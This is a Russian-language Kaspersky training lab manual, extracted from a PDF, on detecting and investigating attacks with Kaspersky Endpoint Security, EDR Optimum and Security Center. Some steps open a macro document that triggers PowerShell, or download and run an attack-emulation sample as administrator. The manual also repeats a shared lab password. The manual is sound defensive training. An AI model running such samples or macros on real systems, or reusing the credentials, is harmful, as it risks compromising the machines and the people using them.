нажмите OK дважды и
Save
12. Подтвердите применение
данных настроек.
Нажмите Yes
13. Подождите, пока политика
Задание B: Проверьте, что Адаптивный Контроль Аномалий блокирует запуск

вредоносного макроса
Отправьте письмо с вложением, содержащим вредоносный скрипт, и убедитесь, что запуск файла будет
заблокирован.
14. Войдите в систему с логинов ABC\Alex и паролем Ka5per$Ky

15. Зайдите в Documents
16. Распакуйте архив Weekly Report.rar. Пароль infected
125
17. Запустите Thunderbird

18. Создайте новое письмо
19. Укажите адресата. В поле To
введите
20. В поле Subject введите
Weekly report
21. Приложите к письму файл
Weekly report (ps).doc,
который вы извлекли из
архива
22. Отправьте письмо: нажмите
Send
23. Запустите Thunderbird

24. Откройте вложение Weekly
report (ps).doc
25. В окне Microsoft Windows

нажмите Enable content
126
Имитировать атаку на сеть предприятия
26. Убедитесь, что появилось

сообщение о запрете запуска
PowerShell.exe
28. Убедитесь, что действие
заблокировано Kaspersky
Endpoint Security
29. Откройте отчет программы

30. Выберите Adaptive Anomaly Control
31. Найдите событие о блокировке действия
32. Закройте окно Microsoft Word
В этой лабораторной работе был рассмотрен функционал компонента Адаптивный Контроль Аномалий. Он
может как уведомлять о срабатывании скрипта или аномальном поведении программы, так и блокировать
запуск процесса, макроса или powershell.

Сценарий. Вы настроили все средства защиты Kaspersky Endpoint Security for Windows. Имитируйте атаку
злоумышленника на сеть предприятия и ознакомьтесь с деталями доступными для анализа в Kaspersky
Endpoint Security for Windows об отраженной атаке.
127
1. Имитируйте действия злоумышленника по атаке на лабораторный полигон

2. Ознакомьтесь с результатами атаки
Задание A: Имитируйте действия злоумышленника по атаке на лабораторный

полигон
В этом задании необходимо запустить тестовый файл, эмулирующий действия составной атаки на сеть
предприятия, чтобы проверить работу продукта.
1. Войдите в систему с логинов

Ka5per$Ky
2. Откройте браузер Google
Chrome
3. Скачайте архив с
исполняемым файлом,
который имитирует
вредоносную активность по
ссылке:
https://kas.pr/edro_sample
4. Откройте папку с
сохраненным файлом
5. Распакуйте архив sw_test.zip
Пароль: infected
6. Запустите исполняемый файл

sw_text.exe с правами
администратора
7. Откройте локальный интерфейс Kaspersky Endpoint Security
8. Перейдите в Reports
9. Убедитесь, что компонент Exploit Prevention заблокировал угрозу
10. Перезагрузите компьютер
128
Задание B: Ознакомьтесь с результатами атаки

Изучите события, полученные в результате блокировки сложной атаки средствами Kaspersky Endpoint
Security for Windows.
Задание выполняется на компьютере Admin-laptop.

12. Откройте в боковом меню Devices | Managed devices
13. Откройте свойства узла Alex-Desktop
14. Перейдите на вкладку Events и ознакомьтесь с событиями атаки
Kaspersky Endpoint Security отразил атаку и заблокировал вредоносный файл, но мы не знаем, что этот
файл делал на устройстве и не можем понять нужно ли предпринимать дополнительные действия
Лабораторная работа показывает, как имитировать атаку на лабораторный полигон. В последующих

лабораторных работах мы проанализируем аналогичную атаку при помощи функционала Kaspersky
Endpoint Detection and Response.
129
Развернуть Kaspersky Endpoint Detection and Response

Сценарий. Компания приняла решение усилить систему защиты и приобрела код активации Kaspersky EDR
Optimum. Вам необходимо развернуть компонент Endpoint Detection and Response Optimum на компьютерах
с Kaspersky Endpoint Security.
1. Установите компонент Endpoint Detection and Response Optimum

2. Активируйте Kaspersky EDR Optimum
3. Проверьте, что компонент Endpoint Detection and Response Optimum активирован
Задание A: Установите компонент Endpoint Detection and Response Optimum

C помощью задачи смены состава компонентов Kaspersky Endpoint Security установите компонент Endpoint
Detection and Response Optimum.
Задание выполняется на компьютере admin-laptop.
1. Войдите на компьютер Admin-Laptop под учетной записью abc\Admin с паролем Ka5per$Ky

3. Откройте окно Devices | Tasks
4. Нажмите Add, чтобы создать новую задачу
130
5. Выберите:
— Application: Kaspersky Endpoint Security for Windows
— Task type: Change application components
7. Отметьте группу Managed devices и нажмите Next
8. Отметьте параметр Open task details when creation is

complete и нажмите Finish

10. Отметьте компонент Endpoint Detection and Response
Optimum
131
12. Отметьте задачу Change application components и нажмите Start
13. Дождитесь завершения выполнения

задачи Change application components
14. Откройте окно свойств задачи
15. Убедитесь, что задача выполнилась
успешно на четырех устройствах
16. Закройте окно свойств задачи
132
Задание B: Активируйте Kaspersky EDR Optimum

Добавьте ключ активации Kaspersky EDR Optimum в хранилище Kaspersky Security Center и включите
автоматическое распространение ключа.
Задание выполняется на компьютере admin-laptop.
17. Откройте страницу Operations | Licensing | Kaspersky Licenses

19. Выберите Add key file

20. Нажмите Select key file и укажите место
расположения ключа
Расположение файла ключа активации уточните у

преподавателя
21. Отметьте параметр Automatically distribute license

key to managed devices и нажмите Save
22. Подождите 3-5 минут пока ключ автоматически распространится на компьютеры
133
Задание C: Проверьте, что компонент Endpoint Detection and Response Optimum

активирован
Убедитесь, что установленные компоненты Endpoint Detection and Response Optimum активированы, т.е.
получили ключ активации.
23. Перейдите в окно Monitoring & Reporting | Reports

24. Откройте отчет Report on usage of license keys
25. Перейдите на вкладку Details. Обратите внимание, что теперь каждый компьютер использует два
кода активации. Один для активации Kaspersky Endpoint Security for Windows и второй для активации
Kaspersky EDR
134
Подготовить Kaspersky EDR к работе
Функционал Endpoint Detection and Response интегрирован в Kaspersky Endpoint Security for Windows в виде
компонента Endpoint Detection and Response Optimum. В этой лабораторной мы добавили этот функционал,
просто доставив необходимый компонент задачей изменения состава компонентов Kaspersky Endpoint
Security for Windows, и распространили соответствующий код активации.

Сценарий. Вы изменили состав компонентов Kaspersky Endpoint Security: добавили компонент Endpoint
Detection and Response Optimum. По умолчанию компонент не работает. Ваша задача — подготовить веб-
консоль к работе с компонентом Endpoint Detection and Response Optimum (добавить виджет и включить
отображение узла Alerts), а также включить Endpoint Detection and Response Optimum и проверить его
работоспособность.
1. Добавьте виджет и включите отображение узла Alerts

2. Включите компонент Endpoint Detection and Response
3. Проверьте работоспособность компонента Endpoint Detection and Response
135
Задание A: Добавьте виджет и включите отображение узла Alerts

В этом задании необходимо подготовиться к работе с обогащенными событиями обнаружения Kaspersky
Endpoint Agent: добавить виджет Alerts и убедиться, что после смены кода активации появился новый узел
Alerts в ветке Monitoring & Reporting.

3. В боковом меню перейдите в Monitoring & Reporting | Dashboard
4. Добавьте новый виджет. Нажмите Add or restore web widget
136
5. Разверните ветку Threat statistics

6. Выберите виджет Alerts и нажмите Add
7. Откройте настройки интерфейса: щелкните

мышью по KSC\Administrator в левом нижнем
углу и выберите Interface options
8. Включите параметр Show EDR alerts и

нажмите Save
Если Endpoint Detection and Response активируется с помощью кода (а не файла ключа), изменения в
настройках интерфейса происходят автоматически. После добавления кода появляется узел Alerts,
отключаются параметры Show data encryption and protection и Show MDR features и включается параметр
Show EDR alerts.
137
Задание B: Включите компонент Endpoint Detection and Response Optimum

По умолчанию компонент Endpoint Detection and Response не активен т.е. выключен. В этом задании
необходимо включить Endpoint Detection and Response.
9. Перейдите в окно Devices | Policies & Profiles

10. Откройте окно свойства политики Kaspersky Endpoint Security for Windows
11. Перейдите на вкладку Application

settings
12. Перейдите в раздел Essential Threat
Protection
13. Включите компонент Firewall

Компонент Firewall позволяет Kaspersky EDR
Optimum собирать телеметрию о сетевых
соединениях
138
14. Перейдите в раздел Detection and Response

15. Откройте настройки области Endpoint Detection and Response
16. Включите компонент Endpoint Detection and Response

17. Нажмите ОК
18. Сохраните настройки политики
139
Задание C: Проверьте работоспособность компонента Endpoint Detection and

Response Optimum
В этом задании необходимо запустить тестовый файл, эмулирующий действия составной атаки на сеть
предприятия, чтобы проверить работу работу компонента EDR – получить обогащенное событие
обнаружения – карточку обнаружения.
19. Войдите в систему с логинов

20. Перейдите в папку с
распакованным архивом
sw_test.zip
21. Запустите еще раз файл sw_test
с правами администратора
Перейдите на компьютер Admin-Laptop
22. Перейдите в окно Monitoring & reporting | Dashboard

23. Найдите виджет Alerts. Обратите внимание, что
появилось обогащённое событие – счетчик Enriched
больше 0
24. Перейдите по ссылке Enriched
Виджет Alerts имеет три счетчика событий, связанных с обнаружением вредоносных объектов:
– Счетчик Basic - показывает количество событий без карточки обнаружения
– Счетчик Enriched – показывает количество событий, имеющих дополнительное описание —
карточку обнаружения
– Общий счетчик – суммарное количество событий с карточкой и без карточки обнаружения
Переход по ссылкам Basic и Enriched приводит на страницу Alerts, на которой отображается список всех
событий, связанных с обнаружением вредоносных объектов. Также вы можете найти страницу Alerts в
меню Monitoring & Response
140
25. Нажмите Filter
26. На вкладке Filters нажмите Add

27. В поле Property выберите Enrichment and response
28. Выберите условие =
29. В поле значение введите Enriched
30. Нажмите Apply
31. Закройте окно фильтра
32. Выберите событие с обогащением с компьютера Alex-Desktop и нажмите More Details
Лабораторная работа показывает, как включить Endpoint Detection and Response в режиме обогащения
событий обнаружения и получить карточку обнаружения вредоносной активности. В режиме обогащения
Endpoint Detection and Response дополняет события обнаружения, сгенерированные другими компонентами
Kaspersky Endpoint Security, дополнительной информацией – карточкой обнаружения вредоносной
активности.
141
Расследовать инцидент

Сценарий. Вы включили Kaspersky Endpoint Detection and Response в режиме обогащения событий
обнаружения и получили карточку обнаружения вредоносной активности. Теперь необходимо детально
проанализировать информацию, приведенную в карточке обнаружения вредоносной активности, чтобы
выяснить вектор атаки, изолировать от сети атакованные компьютеры, исследовать файлы оставшиеся
после атаки и настроить автоматическое предотвращение подобных угроз.
1. Проанализируйте общую информацию карточки обнаружения и включите сетевую изоляцию для

компьютера Admin-Laptop
2. Изучите файлы, созданные в результате запуска вредоносного файла
3. Исследуйте файл droppedfile1
4. Проанализируйте изменения в реестре
5. Создайте правило блокирования
6. Создайте задачу поиска индикаторов компрометации
7. Снимите сетевую изоляцию с компьютера
142
Задание A: Проанализируйте общую информацию карточки обнаружения и

включите сетевую изоляцию для компьютера Admin-Laptop
В этом задании необходимо открыть карточку обнаружения, проанализировать общую информацию о
вредоносной активности и изолировать атакованный компьютер от сети.

3. Откройте окно Monitoring & reporting | Reports
4. Выберите отчет Report on threats и нажмите Open report template properties
5. Перейдите на вкладку Fields

6. Удалите Virtual Administration Server
143
8. В поле Field name выберите

Component и нажмите ОК
9. Переместите Open alert и Component

на верх списка с помощью кнопки Move
up
10. Сохраните изменения в шаблоне отчета
11. Откройте отчет Report on threats и перейдите на вкладку Details

12. Найдите событие с компьютера Alex-Desktop со значением View alert в столбце Open alert
13. Обратите внимание на то, какой компонент Kaspersky Endpoint Security нашел угрозу
14. Перейдите по ссылке View alert
Компонент Endpoint Detection and Response обогащает дополнительной информацией события

обнаружения, сгенерированные другими компонентами KES. Эта дополнительная информация
отображается в карточке инцидента данного события.
144
15. Обратите внимание, что первый файл sw_test.exe был запущен из-под легитимного процесса
explorer.exe, так как мы запускали его от имени администратора
16. Запущенный пользователем файл sw_test.exe создал файл zncmbk.exe в директории
C:\Users\alex\AppData\Local\Temp
Имя файла генерируется случайным образом и может отличаться от приведенного в руководстве
17. Запущенный вредоносный процесс внес изменения в реестр, установил сетевые соединения и создал
дополнительные файлы на компьютере
18. Обратите внимание на информацию в области Alert. Был заблокирован файл

C:\Users\alex\AppData\Local\Temp\zncmbk.exe, (он был создан в результате запуска файла
sw_test.exe, который загрузил пользователь)
19. Обратите внимание на информацию в области Process. Процесс sw_test.exe был запущен с
параметром evil из-под учетной записи пользователя ABC\alex
Рекомендуется изолировать скомпрометированный компьютер, прежде чем приступать к детальному

анализу инцидента.
145
20. Включите сетевую изоляцию для

компьютера Alex-Desktop: нажмите
Isolate computer from the network
21. Подтвердите изоляцию компьютера
22. Перейдите в окно Devices | Tags | Device Tags

23. Нажмите View devices, чтобы увидеть, каким компьютерам был присвоен тег ISOLATED FROM
NETWORK
Если тег еще не появился, то подождите 3-5 минут и обновите страницу
24. Обратите внимание, что компьютеру Alex-Desktop был автоматически назначен тег Isolated from
network
Данный тег будет назначаться всем компьютерам, к которым будет применена сетевая изоляция, и
неважно, в ручном или автоматическом режиме.
146
Задание выполняется на компьютере alex-desktop.
25. Войдите на компьютер Alex-

Desktop под учетной записью
abc\Alex с паролем Ka5per$Ky
26. Убедитесь, что сетевая
изоляция применилась к
компьютеру alex-desktop.
Нажмите ОК
Когда вы переключитесь на alex-

desktop, окно уведомления от
Kaspersky Endpoint Security уже
может пропасть. Не волнуйтесь -
просто переходите к следующим
шагам
27. Запустите интерфейс командной

строки
28. Проверьте доступность
компьютера dc.abc.lab и
публичного DNS сервера 8.8.8.8
Выполните команду Ping
29. Убедитесь, что сетевая

изоляция работает и компьютер
dc.abc.lab и IP-адрес
публичного DNS недоступны
147
Задание B: Изучите файлы, созданные в результате запуска вредоносного файла

В этом задании необходимо выяснить, какие файлы были созданы на компьютере в результате запуска
вредоносного файла, получить файл <droppedfile1> и изучить его.
30. Перейдите в окно Monitoring & Reporting | Alerts

31. Нажмите Filter
32. На вкладке Filters нажмите Add

33. В поле Property выберите Enrichment and response
34. Выберите условие =
35. В поле значение введите Enriched
36. Нажмите Apply
148
37. Выберите событие с обогащением с компьютера Alex-Desktop и нажмите More Details
38. Нажмите левой клавишей мыши на значок заблокированного файла zncmbk.exe
39. Нажмите левой клавишей мыши на ссылку

контрольной суммы MD5
40. В контекстном меню выберите Look up on Kaspersky
Open Threat Intelligence Portal
149
41. Ознакомьтесь с информацией по найденному файлу, которая доступна на сайте Kaspersky Threat
Intelligence Portal
42. Вернитесь в веб-консоль Kaspersky Security Center

43. Откройте список файлов, созданных в результате запуска файла zncmbk.exe: нажмите File drop
150
44. Ознакомьтесь со списком созданных файлов

45. Перейдите по ссылке c:\Users\alex\appdata\local\
temp\droppedfile1
46. Выделите и скопируйте путь в поле Name
Файл droppedfile1 не является исполняемым файлом,

поэтому Kaspersky Endpoint Security не считает для него
контрольную сумму.
47. Закройте окно File drop

48. Закройте окно со списком файлов
49. Закройте окно с карточкой обнаружения
151
Задание C: Исследуйте файл droppedfile1

В этом задании необходимо с помощью задачи Get file получить неисполняемый файл droppedfile1 и
изучить его.
50. Откройте окно Devices | Tasks

52. Выберите:
— Application: Kaspersky Endpoint Security for Windows
— Task type: Get file
53. Выберите параметр Specify device addresses manually or
import addresses from a list и нажмите Next
Задача Get file помещает копию файла в карантин, исходный

файл остается на месте
54. Нажмите Add devices
152
55. В верхнем поле выберите Select networked devices

detected by Administration Server
56. Разверните группу Managed devices / Workstations /
Desktops
57. Выберите компьютер Alex-Desktop и нажмите Add
58. В следующих двух окнах нажмите Next
59. Отметьте параметр Open task details when creation

is complete и нажмите Finish
60. Перейдите на вкладку Application

Settings
62. В поле Full file path вставьте ранее

скопированный путь к файлу
droppedfile1 и нажмите ОК
63. Сохраните настройки и запустите
задачу Get file
64. Дождитесь успешного выполнения
задачи
153
65. Перейдите в окно Operations | Repositories | Quarantine

66. Выберите файл droppedfile1 и нажмите Download
67. Откройте папку с сохраненным

файлом
68. Выберите сохраненный файл
и откройте его с помощью
программы Notepad
69. Закройте окно программы
Notepad
Задание D: Проанализируйте информацию о сетевых соединениях

В этом задании необходимо проанализировать информацию о сетевых соединенияx, которые были
зафиксированы в процессе выполнения вредоносной активности. С помощью Kaspersky Threat Intelligence
Portal получить дополнительную информацию о внешних IP-адресах, на которые были установлены эти
соединения.
154
70. Вернитесь в карточку обнаружения вредоносной активности на компьютере Alex-Desktop

71. Откройте список соединений, которые были установлены в результате запуска вредоносного файла.
Нажмите Network connection
72. Изучите список IP-адресов и порты,

по которым были установлены
соединения
73. Перейдите по ссылке
93.184.216.34:80
155
74. Скопируйте IP-адрес 93.184.216.34
75. Перейдите на веб-страницу

Kaspersky Threat Intelligence Portal
на вкладку Lookup
76. Вставьте скопированный IP-адрес и
нажмите клавишу Enter
77. Ознакомьтесь с полученным
результатом
78. Вернитесь в веб-консоль Kaspersky Security Center

79. Самостоятельно проверьте на Kaspersky Threat Intelligence Portal второй IP-адрес
80. Закройте окно Network connection и окно Events
156
Задание E: Проанализируйте изменения в реестре

В этом задании необходимо изучить изменения, внесенные в реестр вредоносной программой, и найти
ключи реестра, являющиеся точками автозапуска вредоносных процессов.
81. Вернитесь в карточку обнаружения вредоносной активности на компьютере Alex-Desktop

82. Откройте список изменений, которые были внесены в реестр компьютера Alex-Desktop в результате
запуска вредоносного файла - нажмите Registry
83. Ознакомьтесь со списком изменений в реестре

84. Нажмите Ctrl+F и поищите ключ Run
85. Щелкните левой клавишей мыши по найденному ключу
157
86. Обратите внимание на область

Autorun point. Данный ключ
является точкой автозапуска
файла sw_test
87. Вернитесь в карточку
инцидента
Задание F: Создайте правило блокирования

В этом задании необходимо создать правило блокирования для файла sw_test.exe и включить функционал
запрета запуска объектов.
88. Вернитесь в карточку обнаружения вредоносной активности на Alex-Desktop

89. Нажмите на значок незаблокированного файла sw_test.exe
158
90. Нажмите Prevent execution
91. В следующем окне нажмите OK

92. Закройте окно карточки обнаружения
93. Перейдите в окно Devices | Policies & Profiles

94. Откройте окно политики Kaspersky Endpoint Security for Windows
95. Перейдите на вкладку Application settings в раздел Detection and Response

96. Откройте настройки области Endpoint Detection and Response
159
97. Включите Execution Prevention

98. Выберите параметр Block and write to report
99. Проверьте, что в области Execution prevention в таблице добавилось правило блокирования
запуска файла sw_test.exe
100. Откройте окно настройки правила
101. Обратите внимание, что для поиска файла в

правиле используется MD5 контрольная сумма этого
файла
При создании правил блокирования запуска можно

использовать путь к файлу и/или контрольную сумму
файла. Правила блокирования можно создавать для
исполняемых файлов, скриптов и документов Microsoft
Office
102. Дважды нажмите ОК и сохраните настройки

политики
103. В проводнике Windows

откройте папку Downloads
104. Разархивируйте архив
sw_test.zip. Пароль: infected
105. Запустите файл sw_test.exe
160
106. Убедитесь, что запуск файла

sw_test был заблокирован
Kaspersky Endpoint Security
Обратите внимание, что Kaspersky

Endpoint Security не удаляет файл, а
только блокирует его запуск.
107. Закройте окно,

информирующее о
невозможности запуска файла
Задание G: Создайте задачу поиска индикаторов компрометации

В этом задании необходимо, используя информацию из карточки обнаружения вредоносной активности,
создать индикатор компрометации и задачу поиска этого индикатора.
108. Перейдите в окно Monitoring & reporting | Alerts

109. Найдите событие с компьютера Alex-Desktop и откройте карточку обнаружения
161
110. Перейдите на вкладку All alert events

111. Отметьте объект C:\Users\alex\Donwloads\sw_test\sw_test.exe
112. Найдите ключ реестра, являющийся точкой автозапуска. Нажмите Ctrl+F и найдите ключ Run
113. Отметьте найденную ветку реестра и нажмите Create IOC
114. Выберите условие OR

115. Нажмите Export IOC collection
116. Закройте окно создания IOC
117. Закройте карточку инцидента
162
118. Перейдите в папку

Downloads и распакуйте
архив с
экспортированным
файлом IOC
119. В боковом меню перейдите в Devices | Tasks

121. В поле Application выберите Kaspersky Endpoint

122. В поле Task type выберите IOC Scan
124. Выберите Managed devices

125. Нажмите Next дважды
163
126. Отметьте опцию Open task details when creation is

complete и нажмите Finish
127. На вкладке
Application settings
нажмите Redefine IOC
files
128. Нажмите Add IOC

files
129. Перейдите в папку с
распакованным
файлом IOC и
выберите его
131. Включите Take

response after an IOC
is found, а затем
включите опции:
— Isolate computer
from the network
— Move copy to
Quarantine, delete
object
164
На практике, изолировать компьютер от сети имеет смысл, если на компьютере найдены оба индикатора
компрометации одновременно – файл и ключ. В рамках лабораторной работы будут блокироваться
компьютеры, на которых найден хотя бы один индикатор компрометации.
133. Запустите задачу и дождитесь ее завершения

134. Откройте свойства задачи
135. На вкладке Application settings перейдите в раздел IOC Scan Results

136. Перейдите по ссылке IOC detected в строке компьютера Alex-Desktop
137. Перейдите по ссылке

matched
165
138. Ознакомьтесь с результатом поиска индикатора компрометации на компьютере Alex-Desktop.
139. Перейдите в окно

Operations |
Repositories |
Quarantine
140. Убедитесь, что задача
поиска индикаторов
компрометации
переместила
найденные файлы в
карантин
166
141. Перейдите в окно Devices | Tags | Device tags

142. Перейдите по ссылке View devices
143. Убедитесь, что в результате выполнения задачи поиска индикаторов компрометации компьютер
Alex-Desktop был изолирован от сети и ему был присвоен соответствующий тег
Задание H: Снимите сетевую изоляцию с компьютера
144. Перейдите по ссылке Alex-Desktop
167
Настроить защиту паролем

146. Откройте окно свойств Kaspersky
Endpoint Security for Windows
147. Перейдите на вкладку Application settings в раздел Detection and Response

148. Перейдите по ссылке Endpoint Detection and Response
149. Снимите сетевую изоляцию с

компьютера alex-desktop. Нажмите
Unblock computer isolated from the
network
Лабораторная работа показывает, как работать с карточкой инцидента Kaspersky Endpoint Detection and
Response и отреагировать на обнаруженный инцидент безопасности.

Сценарий. Чтобы пользователи не отключали защиту, установите пароль на Kaspersky Endpoint Security и
на Агент администрирования.
168
1. Найдите компьютер с выключенной защитой

2. Установите пароль на Kaspersky Endpoint Security
3. Установите пароль на удаление Агента администрирования
Задание A: Найдите компьютер с выключенной защитой

На компьютере Alex-Desktop выйдите из Kaspersky Endpoint Security. Найдите в веб-консоли сервера
администрирования на странице Dashboard сообщение, что на компьютерах выключена защита.
Перейдите в выборку компьютеров, на которых выключена защита. Откройте свойства компьютера,
найдите программу Kaspersky Endpoint Security и запустите ее.
1. Войдите в систему с логином ABC\Alex и паролем

Ka5per$Ky
2. Выгрузите Kaspersky Endpoint Security из памяти, используя
контекстное меню иконки продукта
3. Войдите в систему под учетной записью abc\Admin. Пароль — Ka5per$Ky
169

5. В боковом меню выберите Monitoring & reporting | Dashboard
6. Обратите внимание, что на одном из устройств статус защиты Critical
Статус может измениться не мгновенно. На обновление может уйти около 5 минут.
7. Пройдите по ссылке Critical, для просмотра списка устройств

8. Убедитесь, что защита не запущена на устройстве Alex-Desktop
9. Пройдите по ссылке Alex-Desktop, чтобы открыть свойства устройства

11. Выберите Kaspersky Endpoint Security и нажмите Start
12. Закройте свойства компьютера
170
13. В боковом меню выберите Monitoring & reporting | Dashboard

14. Обратите внимание, что статус защиты изменился
Чтобы обновить данные в виджете вручную, нажмите на иконку шестеренки, а затем на Refresh
Задание B: Установите пароль на Kaspersky Endpoint Security

Найдите в политике Kaspersky Endpoint Security для Windows для рабочих станций настройки пароля (среди
настроек интерфейса). Включите защиту паролем и распространите ее на все операции с Kaspersky
Endpoint Security.
На компьютере Alex-Desktop попробуйте выйти из Kaspersky Endpoint Security. Убедитесь, что без пароля
выйти не получается. Попробуйте удалить Kaspersky Endpoint Security через Панель управления Windows.
Убедитесь, что для этого тоже нужно знать пароль.

171

19. В разделе General settings нажмите
Interface
20. Нажмите на выключатель Password protection

21. Введите пароль Ka5per$Ky дважды
172
Продолжите выполнять задание на компьютере Alex-Desktop.
24. Попробуйте выйти из KES через

контекстное меню его иконки в панели
задач
Kaspersky Endpoint Security запросил пароль.

Вы можете ввести пароль Ka5per$Ky для
пользователя KLAdmin и произвести
желаемое действие
25. Нажмите Cancel в окне аутентификации
Продолжите выполнение задания на компьютере Admin-Laptop.

173
28. Откройте политику Kaspersky Endpoint

30. В разделе General settings нажмите
Interface
31. Нажмите Add, чтобы добавить пользователя
32. Пройдите по ссылке Select user or group
174
33. Выберите пользователя ABC\Alex из

списка
34. Нажмите Select
35. Отметьте операции:

— Application settings
— Disable Kaspersky Security Center
policy
— Exit the application
Теперь alex сможет отключить Kaspersky
Endpoint Security, отключить его от политики,
изменить настройки приложения, но не сможет
удалить его
37. Убедитесь, что пользователь Alex был добавлен в список

38. Сохраните изменения: нажмите OK
39. Сохраните политику: нажмите Save и Yes
175
Продолжите выполнение задания на компьютере Alex-Desktop.
41. Войдите в систему под учетной

записью ABC\Alex. Пароль —
Ka5per$Ky
42. Попробуйте выйти из KES через
контекстное меню его иконки в
панели задач
43. Убедитесь, что теперь Kaspersky
Endpoint Security не запрашивает
пароль и программа успешно
завершается

45. Введите appwiz.cpl и нажмите OK
46. В открывшемся окне выберите

Kaspersky Endpoint Security for
Windows и нажмите Change
47. Убедитесь, что кнопка Uninstall
заблокирована
176
48. Нажмите Remove
49. Убедитесь, что для этого действия

мастер установки требует учетные
данные пользователя, который
имеет право на удаление программы
50. Закройте мастер – нажмите Cancel и
подтвердите выход
51. Запустите Kaspersky Endpoint Security for Windows
177
Задание C: Установите пароль на удаление Агента администрирования

Откройте политику Агента администрирования и найдите в ней настройки пароля. Включите защиту
паролем, введите пароль и сделайте эти настройки обязательными, т.е. запретите их редактировать.
На компьютере Alex-Desktop попробуйте удалить Агент администрирования. Не вводите пароль и

убедитесь, что просто так удалить Агент нельзя.
Начните выполнять задание на компьютере Admin-Laptop.

54. Откройте политику Kaspersky Security Center Network Agent
178

56. В разделе Settings включите защиту паролем: Use uninstallation password
57. Введите пароль Ka5per$Ky
58. Сделайте настройку Use uninstallation password обязательной, т.е. закройте замок для данной
настройки и нажмите Save
60. Откройте окно Apps & features

61. Выберите Kaspersky Security Center
Network Agent
62. Попробуйте удалить Агент: выберите
Uninstall
63. В информационном окне Windows
подтвердите намерение удалить
программу
179
Настроить панель мониторинга
64. В окне приветствия мастера удаления

нажмите Next
65. Не вводите пароль и нажмите Next
66. Убедитесь, что без ввода пароля
удалить Агента администрирования
нельзя
67. Закройте сообщение программы

удаления кнопкой OK
68. Выйдите из мастера: нажмите Cancel
69. Подтвердите, что хотите выйти:
нажмите Yes
70. Закройте мастер: нажмите Finish
Вы установили защиту паролем на Kaspersky Endpoint Security и Агент администрирования. Теперь

пользователи не смогут удалить программы Лаборатории Касперского, выйти из Kaspersky Endpoint Security
или остановить защиту.
Остановить службу или процесс Kaspersky Endpoint Security пользователи тоже не могут. Этому
препятствует самозащита Kaspersky Endpoint Security.
Чтобы скрыть от пользователей, что на компьютере установлен Kaspersky Endpoint Security, не

отображайте иконку KES в области уведомлений. Эта настройка есть в разделе Интерфейс в политике
Kaspersky Endpoint Security.

Сценарий. Каждый день вы заходите в консоль Kaspersky Security Center, чтобы понять, работает ли
защита, и нет ли угроз, с которыми нужно разобраться. Чтобы тратить меньше времени, создайте панель
мониторинга и наполните его панелями, которые дадут ответы на все вопросы на одном экране.
1. Добавьте новые виджеты в панель мониторинга

2. Удалите и переместите виджет
180
Задание A: Добавьте новые виджеты в панель мониторинга
1. Откройте веб-консоль Kaspersky Security Сenter

2. В боковом меню выберите Monitoring & Reporting | Dashboard
3. Обратите внимание, что веб-консоль Kaspersky Security Center имеет ряд предустановленных
виджетов
4. Чтобы добавить новый

виджет, нажмите Add or
restore web widget
181
5. Разверните секцию Update и выберите Distribution

of anti-virus databases
7. Новый виджет был

добавлен в список
8. Нажмите Add or restore
web widget
182
9. Разверните секцию Threat statistics и выберите

History of network attacks
11. Чтобы отредактировать

отображение виджета,
нажмите по иконке
управления виджетом
12. Выберите Chart type: Lines
183
13. Отображение виджета было

изменено
184
Задание B: Удалите и переместите виджет

Удалите и поменяйте порядок отображения виджетов в панели мониторинга
14. В виджете New devices

нажмите иконку шестеренки
и выберите Hide web
widget
15. Согласитесь с предупреждением: нажмите OK

16. Обратите внимание, что на место удаленного
виджета был перемещен стоящий за ним
185
17. В виджете Most

frequent threats
нажмите иконку
шестеренки и
выберите Move
18. Кликните по виджету
Threat activity, на
место которого вы
хотите переместить
текущий виджет
19. Виджет Most frequent

threats был
перемещен
Вы добавили необходимые вам виджеты в панель мониторинга, которая показывает всё самое главное о
защите сети.
186
Настроить отчеты

Сценарий. Чтобы быстрее находить нужную информацию и реагировать на угрозы, удалите отчеты,
которые не используете, создайте отчет о зараженных компьютерах за прошедшую неделю, и настройте
каждую неделю получать отчеты о том, что произошло за неделю.

1. Удалите отчеты, которые не используете
2. Создайте отчет о зараженных компьютерах за прошедшую неделю
3. Настройте сервер администрирования отправлять по почте самые важные отчеты
187
Задание A: Удалите отчеты, которые не используете

Удалите все отчеты, кроме:
— Report on Kaspersky software versions
— Report on protection status
— Report on protection deployment
— Report on usage of license keys
— Report on usage of anti-virus databases
— Report on most heavily infected devices
— Network Attack Report
— Report on threats
— Report on users of infected devices
— Weekly report on most heavily infected devices
— Report on Web Control
— Report on file operations on removable drives
— Report on prohibited applications
— Report on triggered Adaptive Anomaly Control rules

2. Перейдите на страницу Monitoring & Reporting | Reports
3. Выберите отчет Report on errors

4. Нажмите Delete
5. Подтвердите, что хотите удалить отчет. Нажмите OK
188
6. Удалите следующие отчеты аналогичным образом:

— Report on hardware
— Report on incompatible applications
— Report on file encryption errors
— Report on blockage of access to encrypted files
— Report on device users
— Report on effective user permissions
— Report on encryption status of mass storage devices
— Report on hardware registry
— Report on license key usage by virtual Administration Server
— Report on rights
— Report on rights to access encrypted drives
— Report on software updates
— Report on vulnerabilities
— Report on attacked controllers
— Report on check of programmable logic controllers (PLCs) for integrity
— Report on results of installation of third-party software updates
— Report on installed applications
— Report on status of application components
— Report on prohibited applications in test mode
— Report on threat detection distributed by component and detection technology
— Report on Adaptive Anomaly Control rules state
189
Задание B: Создайте отчет о зараженных компьютерах за неделю

Переименуйте отчет о зараженных компьютерах в Monthly report on most heavily infected devices; затем
создайте еженедельный отчет.
7. Откройте окно свойств Report on

most heavily infected devices
8. Измените имя отчета Monthly
report on most heavily infected
devices и нажмите Save
9. Создайте новый отчет: нажмите кнопку Add
190
10. Назовите отчет Weekly report on most heavily infected

devices
11. Разверните список Threat statistics и выберите
Report on most heavily infected devices
13. Выберите Administration group и укажите Managed

devices
15. Установите период 7 дней и нажмите OK
16. В появившемся окне выберите Save
191
Задание C: Настройте сервер администрирования отправлять по почте самые

важные отчеты
Настройте сервер администрирования каждую неделю по понедельникам в 10 утра отправлять по почте
отчеты:
— Weekly report on most heavily infected devices

— Network attack report
— Report on usage of anti-virus databases

18. В боковом меню выберите Devices | Tasks
19. Создайте задачу рассылки отчетов. Нажмите Add
20. В списке приложений выберите Kaspersky Security Center

14.2
21. Выберите тип задачи Deliver reports
22. Назовите задачу Deliver reports
192
24. Отметьте следующие отчеты:

— Weekly report on most heavily
infected devices
— Network attack report
— Report on usage of anti-virus
databases
25. Укажите способ отправки отчетов –

Send reports by email
26. Нажмите Settings
27. В поле адреса получателя введите:

193
31. Отключите опцию: Open task

details when creation is
complete
32. Нажмите Finish
